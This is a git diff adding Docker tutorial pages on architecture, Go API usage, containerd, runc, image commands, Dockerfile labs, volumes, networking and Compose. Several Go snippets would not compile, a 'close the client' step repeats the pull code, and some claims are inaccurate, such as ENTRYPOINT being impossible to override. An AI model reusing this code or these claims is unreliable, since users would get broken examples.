+Overall, network isolation capabilities in container security are important for maintaining the security and isolation of containers, as they allow users to specify which containers can communicate with each other and the host system. By using tools such as Docker networks, users can easily implement network isolation in their container environment. \ No newline at end of file diff --git a/content/en/containersecurity/b7.docker-architecture 2.md b/content/en/containersecurity/b7.docker-architecture 2.md new file mode 100644 index 0000000..02e44c7 --- /dev/null +++ b/content/en/containersecurity/b7.docker-architecture 2.md @@ -0,0 +1,279 @@ +--- +title: " Docker architecture and its components " +description: " Dockef Architecture in detail " +slug: "Docker-architecture-and-its-components" +--- + + +Docker architecture and its components + +# Docker Architecture + +![](./images/docker-engine-architecture.svg) + + + +Docker architecture consists of three main components: + +- Docker Engine: This is the core component of Docker and is responsible for building, running, and distributing Docker containers. It is made up of a daemon, a REST API, and a CLI (command line interface). +- Docker Hub: This is a cloud-based registry service that allows users to share and store Docker images. It acts as a central repository for Docker images and makes it easy for users to find and download images that they need for their projects. +- Docker Client: This is a command-line tool that allows users to interact with the Docker daemon and perform various tasks such as building, running, and distributing Docker containers. + +In addition to these main components, Docker architecture also includes other components such as Docker Compose (a tool for defining and running multi-container Docker applications), Docker Swarm (a tool for orchestrating and managing a cluster of Docker containers), and Docker Machine (a tool for creating and managing Docker hosts on various infrastructure platforms). + + +![](./images/docker-architecture.png) + +# Docker Engine + +To interact with the Docker Engine using Go, we can use the official Docker API library for Go, which can be found at https://github.com/docker/docker. + +Here are the steps to interact with the Docker Engine using Go: + +1.Import the necessary libraries: + +```go +import ( + "context" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" +) + +``` +2.Create a new Docker client: + +```go +cli, err := client.NewClientWithOpts(client.FromEnv, client.WithAPIVersionNegotiation()) +if err != nil { + log.Fatal(err) +} + +``` +3.Use the client to perform various actions on the Docker Engine, such as pulling an image from a registry: + +```go +reader, err := cli.ImagePull(context.Background(), "alpine:latest", types.ImagePullOptions{}) +if err != nil { + log.Fatal(err) +} + +io.Copy(os.Stdout, reader) + + +``` + +Close the client when finished: + +```go +reader, err := cli.ImagePull(context.Background(), "alpine:latest", types.ImagePullOptions{}) +if err != nil { + log.Fatal(err) +} + +io.Copy(os.Stdout, reader) + + +``` + + +Using the Docker API library for Go, we can perform various actions on the Docker Engine, such as pulling images, creating and managing containers, and more. + + +# Docker Hub +
+First, we need to import the necessary packages for interacting with Docker Hub. This includes the "net/http" package for making HTTP requests and the "encoding/json" package for parsing the response from Docker Hub. +
+Next, we need to define a function that makes an HTTP GET request to the Docker Hub API endpoint for retrieving a list of all available repositories. We can use the "http.NewRequest" function to create the request and the "http.DefaultClient.Do" function to execute the request. +
+We can then parse the response from Docker Hub using the "json.Unmarshal" function and store the list of repositories in a variable. + +Finally, we can iterate through the list of repositories and print out the name and description of each repository. + +Here is the complete Golang program: + + +```go +package main + +import ( +"encoding/json" +"fmt" +"net/http" +) + +func main() { +// Make HTTP GET request to Docker Hub API endpoint for retrieving list of repositories +req, err := http.NewRequest("GET", "https://hub.docker.com/v2/repositories/", nil) +if err != nil { +fmt.Println(err) +return +} +// Execute request +resp, err := http.DefaultClient.Do(req) +if err != nil { + fmt.Println(err) + return +} + +// Parse response from Docker Hub +var data map[string][]map[string]interface{} +err = json.NewDecoder(resp.Body).Decode(&data) +if err != nil { + fmt.Println(err) + return +} + +// Iterate through list of repositories and print out name and description +for _, repo := range data["results"] { + fmt.Println(repo["name"], repo["description"]) +} +} + + +``` +# Docker Client + + +To interact with the Docker client in Go, we will need to import the github.com/docker/docker/client package and create a new Docker client using the NewClient function. + +Here are the steps to follow: + +1. Install the Docker SDK for Go by running `go get github.com/docker/docker/client`. +2. Import the github.com/docker/docker/client package in your Go code. +3. Create a new Docker client using the client.NewClient function. This function takes a string argument that specifies the Docker daemon URL, and returns a client.Client object. +4. Use the methods provided by the `client.Client` object to interact with the Docker daemon. Some examples of common methods include `ListContainers`, `InspectContainer`, and `CreateContainer`. +For example, to list all running containers on the Docker daemon, you could use the following code: + +```go + +package main + +import ( + "context" + "fmt" + "github.com/docker/docker/client" +) + +func main() { + // Create a new Docker client + cli, err := client.NewClient("unix:///var/run/docker.sock", "v1.39", nil, nil) + if err != nil { + panic(err) + } + + // List all running containers + containers, err := cli.ListContainers(context.Background(), types.ContainerListOptions{All: true}) + if err != nil { + panic(err) + } + + // Print the names of the containers + for _, container := range containers { + fmt.Println(container.Names[0]) + } +} + + +``` + +This code creates a new Docker client using the Unix socket located at `/var/run/docker.sock`, and then lists all running containers using the `ListContainers` method. Finally, it prints the names of the containers to the console. + + + +# Docker Runtime + +- Containerd + +Containerd is a runtime for managing containers on a system. It is designed to be lightweight and efficient, making it a popular choice for use in container-based environments. +
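+If containerd is already installed and running (it ships alongside most Docker installations), you can confirm that the daemon is reachable with its bundled `ctr` client before trying the walkthrough below; otherwise the steps that follow cover installing and starting it:
+
+```bash
+# Print client and daemon version information to verify connectivity
+sudo ctr version
+```
+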
+Here is an example of using containerd to run a container with its bundled `ctr` client:
+
+1. Install containerd on your system:
+
+```bash
+sudo apt-get install containerd
+
+```
+2. Start the containerd daemon:
+
+```bash
+sudo systemctl start containerd
+
+```
+3. Pull an image from Docker Hub using `ctr` (containerd keeps its own image store, so images pulled with `docker pull` are not automatically visible to it):
+
+```bash
+sudo ctr image pull docker.io/library/ubuntu:latest
+
+```
+4. Run a container using containerd:
+
+```bash
+sudo ctr run -t --rm docker.io/library/ubuntu:latest my-container
+```
+
+This will start a new Ubuntu container with the name "my-container" using containerd as the runtime. You can then run commands inside it much like any other container.
+
+
+# shim
+
+Docker runtime is a term that refers to the environment in which Docker containers are executed. It includes the operating system, network, and storage resources required to run the containers. + +The Docker runtime also includes a shim, which is a small utility program that acts as an intermediary between the container and the host operating system. The shim is responsible for starting and stopping the container, as well as handling any errors or issues that may occur during execution. + +An example of how the shim works would be as follows: + +1.The user creates a Docker container and specifies the desired runtime environment (e.g. Linux, Windows, etc.) +2.The container is built and stored in a Docker image, which includes all the necessary files and dependencies for the container to run. +3.When the user runs the container, the shim is activated and begins executing the container's code. +4.The shim manages the container's execution, including starting and stopping the container, handling errors, and allocating resources such as memory and CPU. +5. Once the container finishes executing, the shim shuts it down and releases any resources that were being used. + +The Docker runtime and shim work together to ensure that containers are able to run smoothly and efficiently within the specified environment. + +# runc + +runc is the default runtime for Docker containers. It is a command line tool for running and managing containers according to the Open Container Initiative (OCI) specification. + +Here is an example of using runc to run a Docker container: + +1. First, pull a Docker image from the registry using the 'docker pull' command: + +```bash +docker pull alpine + +``` +2. Next, create a configuration file for the container using the 'runc spec' command: + +```bash +runc spec + +``` + +3. The configuration file can then be modified to specify the container's desired settings, such as the root filesystem, network settings, and runtime options. + +4. To create and start the container, use the 'runc run' command, followed by the name of the container and the configuration file: + +```bash +runc run my-container config.json + +``` +This will start the container based on the specified configuration and run the default command specified in the Docker image. + +To stop the container, use the 'runc kill' command: + +```bash +runc kill my-container + +``` +And to delete the container, use the 'runc delete' command: + +```bash + +runc delete my-container + +``` + + + diff --git a/content/en/containersecurity/b8.Intracting-with-container 2.md b/content/en/containersecurity/b8.Intracting-with-container 2.md new file mode 100644 index 0000000..c1eadd1 --- /dev/null +++ b/content/en/containersecurity/b8.Intracting-with-container 2.md @@ -0,0 +1,1023 @@ +--- +title: "Interacting with container ecosystem " +slug: "Interacting-with-container-ecosystem" +--- + +# Interacting with container ecosystem + +- Docker Images and Image Layers + + - In Docker, an image is a lightweight, stand-alone, executable package that includes everything needed to run a piece of software, including the application code, libraries, dependencies, and runtime. It's used to build and run containerized applications. + + - A Docker image is made up of a series of layers, where each layer represents an instruction in the image's Dockerfile. When you build an image, each instruction in the Dockerfile creates a new layer in the image. 
For example, if the Dockerfile has a COPY instruction to copy in some new files, that creates a new layer in the image with those files. If you then change a file and rebuild the image, only the layers that have changed need to be rebuilt, which makes building images faster and more efficient. + + - Each layer is a delta of the changes made in that instruction compared to the previous layer. When you run a container from an image, Docker creates a new top writable layer on top of the underlying layers, allowing you to make changes to the running container. These changes are not persisted when the container is stopped and removed, unless you commit the changes to a new image. + + - In summary, a Docker image is a lightweight, stand-alone, executable package that contains everything needed to run a piece of software, and it is made up of a series of layers representing instructions in the image's Dockerfile. + +# Docker images commands + +```bash +docker images [OPTIONS] [REPOSITORY[:TAG]] + +``` + +- The default docker images will show all top level images, their repository and tags, and their size. +
+- Docker images have intermediate layers that increase reusability, decrease disk usage, and speed up docker build by allowing each step to be cached. These intermediate layers are not shown by default. +
+- The SIZE is the cumulative space taken up by the image and all its parent images. This is also the disk space used by the contents of the Tar file created when you docker save an image. + +- An image will be listed more than once if it has multiple repository names or tags. This single image (identifiable by its matching IMAGE ID) uses up the SIZE listed only once. + +- docker images - list all local Docker images + +Example: `docker images` +
+ +- ```docker image ls``` - list all local Docker images with additional information such as image ID, repository, and tag + + +Example: `docker image ls` + + +- ```docker image inspect``` - display detailed information about a Docker image + +Example: `docker image inspect ubuntu:latest` +
+ +- ```docker image history``` - show the history of a Docker image +Example: ```docker image history ubuntu:latest``` +
+ +- ```docker image pull``` - download a Docker image from a registry +Example: ```docker image pull ubuntu:latest``` +
+ +- ```docker image push``` - push a Docker image to a registry +Example: ```docker image push my-image:latest``` +
+ +- ```docker image tag``` - add a tag to a Docker image +Example: ```docker image tag ubuntu:latest my-image:latest``` +
+ +- ```docker image build``` - build a Docker image from a Dockerfile +Example: ```docker image build -t my-image:latest .``` +
+ +- ```docker image save``` - save a Docker image to a tar archive +Example: ```docker image save ubuntu:latest > ubuntu.tar``` +
+
+- ```docker image load``` - load a Docker image from a tar archive
+Example: ```docker image load < ubuntu.tar```
+
+
+| Name, shorthand | Default | Description |
+|-|-|-|
+| --all , -a | | Show all images (default hides intermediate images) |
+| --digests | | Show digests |
+| --filter , -f | | Filter output based on conditions provided |
+| --format | | Pretty-print images using a Go template |
+| --no-trunc | | Don't truncate output |
+| --quiet , -q | | Only show image IDs |
+
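+The flags in the table above can be combined. For example, one common clean-up pattern is to use `--filter` together with `--quiet` to collect the IDs of dangling images and remove them in a single step:
+
+```bash
+# Remove all dangling (untagged) images; the inner command prints only their IDs
+docker image rm $(docker images --filter "dangling=true" --quiet)
+```
+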
+ +# List recently created images + +```bash +$ docker images +``` +alternative + +```bash +$ docker image ls +``` + +# Filtering Docker Image List + +```bash +$ docker images --filter " = " + +``` +With the `–filter` option, you can specify the following keys : + +
+ +- ```reference``` : that can be used in order to isolate images having a certain name or tag; + +```bash +$ docker images --filter "reference=deb*" +``` +`before` : to filter images created β€œbefore” a specific point in time; + +```bash +$ docker images --filter "before=" +``` + +```since``` : to filter images since a specific point in time (usually another image creation); + +```bash + docker images --filter "since=" +``` + +```label``` : if you used the LABEL instruction to create metadata for your image you can filter them later with this key + +```bash + $ docker images --filter "label=maintainer=" +``` + +```dangling``` : in order to isolate images that are not used anymore. + +```bash +docker images --filter "dangling=true" +``` + +### Here are some examples of using the 'docker images' command with the '--format' option: + +To list all Docker images and their IDs in a table format, use the following command: + +```bash +docker images --format "table {{.ID}}\t{{.Repository}}" + +``` +output + +```bash +IMAGE ID REPOSITORY +4f4b6b93e0a4 alpine +``` + +To list all Docker images and their sizes in a custom format, use the following command: + +```bash +docker images --format "{{.Size}}\t{{.Repository}}" +``` +output + +```bash +SIZE REPOSITORY +3.99 MB alpine + +``` + +To list all Docker images and their created dates in a custom format, use the following command: + +```bash +docker images --format "{{.CreatedAt}}\t{{.Repository}}" + +``` + +output + +```bash +CREATED AT REPOSITORY +2022-03-01T00:00:00Z alpine +``` + +To list all Docker images with their full repository and tag names, use the `--no-trunc` flag: + +```bash +docker images --all --no-trunc + +``` + +```docker images --quiet``` - This command lists all of the Docker images on the system, but only displays the image IDs. + +```bash +docker images --quiet + +``` + +output + +```bash +cdd72a7d23c8 +``` + +```docker pull --quiet [image name]``` - This command pulls a Docker image from the registry, but only displays the image ID of the image being pulled. + +```bash +docker pull --quiet alpine + +``` + +output + +```bash +d9e555c53f53 +``` + +```docker build --quiet -t [image name] [Dockerfile location]``` - This command builds a Docker image from a Dockerfile, but only displays the image ID of the image being built. + +```bash +docker build --quiet -t my-image . +``` +output + +```bash +24c1f2a1c63d +``` + +# Understand Image Layers +
+Why layers?
+
+Layers save computational effort when building images, and bandwidth when pulling and pushing them.
+
+Build Container images
+
+```bash
+FROM node:alpine
+WORKDIR /app
+COPY package*.json ./
+RUN npm install
+COPY ./ ./
+CMD ["npm", "start"]
+
+```
+
+This Dockerfile contains instructions needed to build a basic Node.js app image on Docker. When you run a `docker build` command, Docker starts executing these instructions one at a time, iteratively.
+
+![](./images/image-layer.png)
+
+Each time a command is executed from the Dockerfile, a new image layer is created on top of the existing image. This process is iterated until Docker reads the last command of the Dockerfile. Each instruction creates a new image layer.
+
+![](./images/image-layer-execute.png)
+
+
+# Composition of a Docker Image
+
+Typically, an image consists of the following:
+
+- Base Image
+
+  - All container images are created from a base image. This is an empty first layer that allows users to build their images from scratch.
+
+  - If you do not want to create your base image from scratch, you can use an official Docker image like CentOS as your base image or customize one of the official Docker images to your requirements.
+
+
+- Parent Image
+
+  - The parent image is, in most cases, the first layer of a Docker image. It is the foundation of all the other layers in your image. Thus, this layer provides the basic building blocks for container environments.
+
+ +- Layers + + - The other Docker layers are added to the base image using a code to allow them to run in a container. Docker’s default status displays all the top-layer images, including file sizes, tags, and repositories. Caching of intermediate layers makes it easier to view the top layers. Storage drives in Docker manage the contents in image layers. + +- Container layer + + - Besides creating a new container, a Docker image creates a container or writable layer. It hosts the changes that you make to your running container. This layer also stores the deleted and newly written files and changes made to the existing files. This layer is also useful when customizing containers. + +- Docker manifest + +The list of all image layers created by specific image names is known as a Docker manifest. These manifests are used the same way you would use an image name in the ```docker run``` and ```pull``` commands. + + +To build a Docker container image using a Dockerfile, follow these steps: + +- Create a new directory and navigate to it in your terminal. +- Inside the directory, create a file named ```Dockerfile``` (without any file extension). +- Inside the Dockerfile, specify the base image you want to build from using the "FROM" directive. For example: + +```bash +FROM alpine +``` + +- Add any additional instructions to the Dockerfile, such as installing packages, copying files, or setting environment variables. +- Save the Dockerfile. +- In your terminal, navigate to the directory containing the Dockerfile. +- Run the `docker build` command, followed by the desired name and tag for the image, and the path to the Dockerfile: + +```docker build -t my-image:latest .``` + +The Docker engine will now build the image based on the instructions in the Dockerfile. +Once the build is complete, you can verify that the image was created by running the "docker images" command: + +```bash +docker images +``` + +# Dockerfile instructions with example + +1.`FROM`: This instruction sets the base image for the Docker container. For example: + +```FROM ubuntu:latest``` + +2.`RUN`: This instruction runs a command in the container. For example: + +```RUN apt-get update``` + +3.`COPY`: This instruction copies files from the host machine to the container. For example: + +```COPY app/ /app``` + +4.`ADD`: This instruction is similar to COPY, but it can also handle URL sources and automatically decompress compressed files. For example: + +```ADD https://example.com/app.tar.gz /app``` + +5.`ENV`: This instruction sets environment variables in the container. For example: + +```ENV LANG=en_US.UTF-8``` + +6.`WORKDIR`: This instruction sets the working directory for the container. For example: + +```WORKDIR /app``` + +7.```EXPOSE```: This instruction exposes a port on the container to be accessed from the host machine. For example: + +```EXPOSE 8080``` + +8.```CMD```: This instruction sets the default command to be run when the container is started. For example: + +```CMD ["python", "app.py"]``` + +9.```ENTRYPOINT```: This instruction sets the default command to be run when the container is started, but it cannot be overridden by command-line arguments. For example: + +```ENTRYPOINT ["python", "app.py"]``` + + +# Lab 1 + + Begin by creating a new file called "Dockerfile" in your project directory. + In the Dockerfile, we will first specify the base image that we will be using. For this example, we will be using the latest version of Ubuntu as our base image. 
+
+```bash
+FROM ubuntu:latest
+```
+
+Next, we will run the necessary commands to install Git on the base image.
+
+```bash
+RUN apt-get update
+RUN apt-get install -y git
+
+```
+Once the installation is complete, we will set the default command to run when the container starts. In this case, we will set it to run the Git version command to confirm that Git is installed and functioning correctly.
+
+```bash
+CMD ["git", "--version"]
+```
+
+Save the Dockerfile and close it.
+To build the Docker image, we will use the "docker build" command and specify the path to the Dockerfile as an argument.
+
+```bash
+docker build -t my_git_image .
+
+```
+
+Once the build is complete, start a new container based on the "my_git_image" image with `docker run my_git_image`. This runs the default command specified in the Dockerfile, and the output should show the version of Git installed in the image.
+
+# Lab 2
+
+In the Dockerfile, specify the base image you want to use. For example:
+
+```bash
+FROM ubuntu:20.04
+
+```
+Add the ADD instruction to your Dockerfile to copy files or directories from your local system into the image. For example:
+
+```bash
+ADD my_file.txt /app/
+ADD my_directory /app/
+
+```
+
+Use the RUN instruction to execute any necessary commands or installs for your image.
+
+Use the CMD instruction to specify the command that will be run when a container is started from this image.
+
+Build the Docker image using the following command:
+
+```bash
+docker build -t my_image_name .
+
+```
+Run the image using the following command:
+
+```bash
+docker run -d my_image_name
+```
+
+# Lab 2
+
+Create a file named `Dockerfile`, open it in your favorite text editor, and add the following content to it:
+
+```bash
+FROM ubuntu:18.04
+CMD ["echo", "Hello, World!"]
+```
+
+This `Dockerfile` specifies that we want to use the `ubuntu:18.04` base image and run the echo command with the arguments `"Hello, World!"` when the container is started.
+
+```bash
+docker build -t myimage .
+docker run myimage
+```
+
+# Lab 3
+
+In the Dockerfile, specify the base image that your image will be built on. For this example, we will use the alpine base image, which is a lightweight version of Linux:
+
+```bash
+FROM alpine
+
+```
+
+Next, add the COPY instruction to copy a file or directory from your local machine into the image. For example, if you want to copy the file `hello.txt` from your current directory into the image, you would use the following instruction:
+
+```bash
+COPY hello.txt /
+
+```
+
+You can also specify a different destination for the file. For example, if you want to copy hello.txt into the /app directory inside the image, you would use the following instruction:
+
+```bash
+COPY hello.txt /app/
+
+```
+
+Now that you have specified the base image and the files to be copied, you can build your Docker image. Run the following command to build the image, replacing my-image with the desired name for your image:
+
+```bash
+docker build -t my-image .
+
+```
+
+To verify that the image was built successfully and that the file was copied into the image, you can run the following command to view the list of available Docker images:
+
+```bash
+docker images
+
+```
+
+You should see your new image listed in the output. To run the image, use the docker run command, followed by the name of the image:
+
+```bash
+docker run my-image
+
+```
+
+# Lab 4
+
+Here is an example of creating a Python app with an Entrypoint instruction:
+
+First, create a new directory for your app and navigate to it in the command line.
+Create a file called `app.py` and add the following code: + +```python +def main(): + print("Hello, world!") + +if __name__ == "__main__": + main() + +``` +Next, create a file called `Dockerfile` and add the following code: + +```bash +FROM python:3.8-slim + +COPY app.py /app/app.py + +ENTRYPOINT ["python", "/app/app.py"] + + +``` + +Build the Docker image by running the following command: + +```bash +docker build -t my-app . +``` + +Run the Docker image by using the following command: + +```bash +docker run my-app + +``` + +# Lab 5 + +```bash +FROM nginx:alpine +WORKDIR /var/www/html +COPY . . +EXPOSE 80 +CMD ["nginx", "-g", "daemon off;"] + +``` + +This Dockerfile will use the nginx:alpine image as a base, set the working directory to /var/www/html, copy all the files in the current directory (.) to the working directory, expose port 80, and start the nginx daemon. + +Now let's create a sample HTML file called`index.html`: + +```html + + + Nginx Workdir Example + + +

Welcome to the Nginx Workdir Example

+ + + + +``` +Now we can build and run the Docker container using the following commands: + +```bash +docker build -t nginx-workdir . +docker run -p 8080:80 nginx-workdir + + +``` +This will build the Docker image with the tag nginx-workdir and run the container, mapping port 8080 on the host machine to port 80 in the container. + +To verify that everything is working, open your web browser and navigate to `http://localhost:8080`. You should see the content of the index.html file displayed. + +That's it! You have successfully created a Docker container using the `WORKDIR` instruction to set the working directory for the nginx daemon. + +# Lab 6 + +- Pull the Nginx image from Docker Hub: + +```bash +docker pull nginx + +``` + +- Create a directory on your local machine that you want to use as the volume for Nginx: + +```bash +mkdir /path/to/volume +``` + +- Run the Nginx container and mount the volume using the -v flag: + +```bash +docker run -d -p 80:80 -v /path/to/volume:/usr/share/nginx/html:ro nginx +``` +- Test that the volume is working by creating a file in the volume directory on your local machine: + +```echo "Hello, World!" > /path/to/volume/index.html``` + +5. Visit http://localhost in your web browser to see the contents of the volume displayed in the Nginx container. + +Note: The -d flag runs the container in detached mode, the -p flag maps port 80 on the host to port 80 in the container, and the :ro flag makes the volume read-only inside the container. + +## Storing data in a container + +- Storing data in a container(mounts, volumes, etc.)
+- Networking in containers
+ +## Storing data in a docker container + +There are several options for storing data in a docker container: + +- Use a volume: Docker volumes allow you to persist data outside of the container, so it can be shared between multiple containers or saved even if the container is stopped or removed. You can create a volume using the "docker volume create" command and then mount it to a specific directory in your container using the "-v" flag in the "docker run" command. + +- Create a volume using the docker volume create command: + +```bash +$ docker volume create data-volume + +``` + +- Run a docker container and mount the volume using the -v flag: + +```bash +$ docker run -d --name my-container -v data-volume:/data ubuntu:latest + +``` + +- Check if the volume is mounted to the container by using the docker inspect command: + +```bash +$ docker inspect my-container | grep Mounts + +``` + +You should see output similar to this: + +```bash +"Mounts": [ + { + "Type": "volume", + "Name": "data-volume", + "Source": "/var/lib/docker/volumes/data-volume/_data", + "Destination": "/data", + "Driver": "local", + "Mode": "", + "RW": true, + "Propagation": "" + } + ], + +``` + +Now, any data that you write to the /data directory inside the container will be persisted in the volume. + +For example, you can create a file in the /data directory: + +```bash +$ docker exec -it my-container touch /data/test.txt + + +``` + +To verify that the data has been persisted, you can run another container and mount the same volume: + +```bash +$ docker run -it --name my-container-2 -v data-volume:/data ubuntu:latest bash + +``` + +Inside the new container, you should be able to see the test.txt file: + +```bash +$ ls /data +test.txt + +``` +This demonstrates how you can use a volume to store data in a docker container. The data will persist even if the container is stopped or deleted, as it is stored in the volume, which is managed by Docker. + +Use a bind mount: + +A bind mount is a file or directory on the host machine that is mounted into a container. This allows you to access data on the host machine from within the container. You can create a bind mount using the `-v` flag in the "docker run" command, specifying the path to the file or directory on the host as well as the desired mount point in the container. + +Create a directory on the host machine that you want to use as the bind mount. For example: + +```bash +mkdir /data + +``` +Run the docker container, using the -v flag to specify the bind mount. The syntax is `-v host_directory:container_directory`. For example: + +```bash +docker run -d -p 8080:80 -v /data:/var/www/html my_web_server + +``` +This will mount the /data directory on the host machine to the /var/www/html directory in the container, which is typically the root directory for web server content. + +- You can now add or modify files in the /data directory on the host machine and they will be automatically reflected in the container's /var/www/html directory. +- To verify that the bind mount is working, you can create a test file in the /data directory on the host machine: + + +```bash +echo "This is a test file" > /data/test.txt +``` +Then, open a shell in the container and check if the file exists in the `/var/www/html` directory: + +```bash +docker exec -it my_web_server /bin/bash +ls /var/www/html + +``` +You should see the test.txt file listed in the output. 
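+If the container only needs to read the shared files, the bind mount can be made read-only by appending `:ro`, or by using the more explicit `--mount` syntax. A sketch reusing the hypothetical `/data` directory and `my_web_server` image from above:
+
+```bash
+# Read-only bind mount using the -v shorthand
+docker run -d -p 8080:80 -v /data:/var/www/html:ro my_web_server
+
+# Equivalent read-only bind mount using --mount
+docker run -d -p 8080:80 --mount type=bind,source=/data,target=/var/www/html,readonly my_web_server
+```
+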
+ +Use a data container: A data container is a container specifically designed to store data that can be shared between multiple containers. You can create a data container using the `docker create` command, and then mount the data container's volume to a specific directory in other containers using the "-v" flag in the "docker run" command. + +Create a new data container using the docker create command. For example: + +```bash +docker create -v /data --name data-container busybox /bin/true + +``` +This creates a data container with a volume at /data and a name of data-container. + +Start the data container using the docker start command. For example: + +```bash + +docker run -it --volumes-from data-container --name app-container ubuntu bash + +``` +This creates a new container named app-container that will use the volume from the data container. + +- In the app-container, you can now access the data stored in the data-container. For example: + +```bash +root@7bd72f1f0f77:/# ls /data + +``` +This will show the contents of the /data volume in the data-container. + +To stop the data container, use the docker stop command. For example: + +```bash +docker stop data-container + +``` +This will stop the data container, but the data will still be available in the app-container. + +To delete the data container, use the docker rm command. For example: + +```bash +docker rm data-container + +``` + +This will delete the data container, but the data will still be available in the app-container. + +4. Use a host path: You can also store data directly on the host machine and access it from within the container using the "-v" flag in the "docker run" command, specifying the path on the host machine as the mount point in the container. However, this option is not recommended as it can lead to issues with container portability and separation of concerns. + +To use a host path to store data in Docker, you will need to use the "-v" flag in the "docker run" command to specify the host path and the container path for the data volume. Here is an example using a MongoDB container: + +First, create a directory on your host machine to store the data: + +```bash +mkdir -p /data/mongodb +``` + +Run the MongoDB container, using the "-v" flag to mount the host path as a data volume in the container: + +```bash +docker run -d --name mongodb -v /data/mongodb:/data/db mongo:latest +``` +You can verify that the data volume is being used by the container by checking the output of the "docker inspect" command: + +```bash +docker inspect mongodb | grep -i "Mounts" +``` + +This should return a list of all the mounted data volumes, including the host path that you specified in the "docker run" command. + +Note: Make sure that the host path that you specify in the "-v" flag exists and is readable/writable by the container. Otherwise, the container may not start or may have issues accessing the data volume. + +# Networking in containers + +There are two types of networking in Docker: + +- Bridge networking: This is the default networking mode in Docker. It creates a virtual network between containers on the same host. Each container is given its own IP address within this network, and containers can communicate with each other using this network. + +First, create a Dockerfile that will build our container: + +```bash + FROM alpine + CMD ["echo", "Hello World!"] + +``` + +Build the image using the following command: + +```bash +docker build -t hello-world . 
+docker run -it hello-world +``` + +Inspect the container's networking configuration using the following command: + +```bash +"NetworkSettings": { + "Bridge": "", + "SandboxID": "4f3c70f4f74b1dc5d5e5e3f5e5ed72c5e5e1f2613e1644b2aa5b004f2ab2d9e8", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": {}, + "SandboxKey": "/var/run/docker/netns/4f3c70f4f74b", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "f48c68e9ce012791d63f0b3ee3b3a85d6c7f6ed5b6c4b6e5b6d5b6c2e5e5f6d4", + "Gateway": "172.17.0.1", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "MacAddress": "02:42:ac:11:00:02", + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "5e5f5c5d5e5d5e5f5d5f5c5e5d5e5d5d5e5f5d5e5f5c5d5e5d5e5f5c5e5f5d5e", + "EndpointID": "f48c68e9ce012791d63f0b3ee3b3a85d6c7f6ed5b6c4b6e5b6d5b6c2e5e5f6d4", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gate + + +``` + +- Overlay networking: This type of networking allows you to connect multiple Docker hosts into a single virtual network. This is useful for situations where you have multiple hosts running Docker containers, and you want them to be able to communicate with each other. + +Overlay networking in Docker allows containers to communicate with each other across multiple hosts. This is useful for situations where you have multiple Docker hosts running and you want to create a network that spans across those hosts. + +To demonstrate overlay networking, we will create two Docker hosts and a single network that will be shared between them. We will then create two containers, one on each host, and demonstrate that they can communicate with each other through the overlay network. + +First, we will create two Docker hosts using Docker Machine. For this example, we will use two virtual machines running on VirtualBox. + +```bash +docker-machine create --driver virtualbox host1 +docker-machine create --driver virtualbox host2 + +``` + +Next, we will create an overlay network on one of the hosts. We will name this network "mynetwork" and specify the `--attachable` flag so that other containers can attach to it + +```bash +eval $(docker-machine env host1) +docker network create --driver overlay --attachable mynetwork + +``` + +Now that the network has been created, we can deploy containers on both hosts and attach them to the network. + +On host1: + +```bash + +eval $(docker-machine env host1) +docker run -d --name container1 --network mynetwork busybox + +``` + +On host2: + +```bash +eval $(docker-machine env host2) +docker run -d --name container2 --network mynetwork busybox + + +``` +Now that both containers are attached to the same overlay network, we can verify that they can communicate with each other. + +On host1: + +```bash +eval $(docker-machine env host1) +docker exec -it container1 ping -c 3 container2 + +``` + +On host2: + +```bash +eval $(docker-machine env host2) +docker exec -it container2 ping -c 3 container1 + +``` + +If the ping commands are successful, it means that the containers are able to communicate with each other through the overlay network. + +This is just a simple example of how overlay networking can be used in Docker. There are many other uses and configurations that can be explored. + +# Docker Compose + +Docker Compose is a tool for defining and running multi-container Docker applications. 
With Compose, you use a YAML file to configure your application's services. Then, with a single command, you create and start all the services from your configuration. + +To install Docker Compose, follow the instructions for your operating system: + +```bash +# For macOS or Linux: +sudo curl -L "https://github.com/docker/compose/releases/download/1.28.5/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose +sudo chmod +x /usr/local/bin/docker-compose + +# For Windows: +Download the Docker Compose binary from https://github.com/docker/compose/releases/download/1.28.5/docker-compose-Windows-x86_64.exe and save it to a location on your PATH (e.g., C:\Program Files\Docker). + + +``` +Once Docker Compose is installed, you can use it to create and start your multi-container Docker application by using the docker-compose up command. For example, suppose you have a YAML file called docker-compose.yml that defines your application's services like this: + +```yaml +version: '3' +services: + web: + build: . + ports: + - "5000:5000" + volumes: + - .:/app + redis: + image: "redis:alpine" + +``` + +You can start all of these services with the following command: + +```bash +docker-compose up + +``` +This command will build the web service image, create and start the web and redis containers, and attach the terminal to the logs of the running containers. + +# Docker Compose Build + +```plaintext +docker-compose build +``` + +### Redeploy just one Service + +```plaintext +docker-compose up $SERVICE_NAME +``` + +### start all services / container using docker compose + +```plaintext +docker-compose up + +// Specify a custom filepath for your +//docker-compose file +// (it assumes docker-compose.yml in +//your current directory by default) +ocker-compose -f custom-docker-compose.yml up + +// Apply multiple compose files (changes in latter) + +docker-compose -f docker-compose.yml docker-compose-production.yml +``` + +# sample docker-compose file + +``` + +#docker-compose.yml file +version: '3' +services: + # Your web application => Container + web: + build: . + ports: + - "5000:5000" + + # Redis cache container + redis: + image: "redis:alpine" + + +``` + +``` + +version: "3" + +networks: + backend: + driver: bridge + +services: + app: + build: + context: . + dockerfile: Dockerfile + container_name: app + image: ${REGISTRY}/my-project-name + restart: always + ports: + - "80:80" + - "443:443" + depends_on: + - db + networks: + - backend + env_file: + - ./.env + + db: + image: mariadb:10.5 + container_name: db + restart: always + networks: + backend + volumes: + - mysql-data:/var/lib/mysql + environment: + - FOO=bar + - SOME_ENV_VAR=${SUBSTITUTED_VARIABLE} + env_file: + - ./.env + +volumes: + mysql-data: + driver: local + + +``` + +labels + +``` +services: + web: + labels: + com.app.description: "My web app" + + +``` + + +[Docker 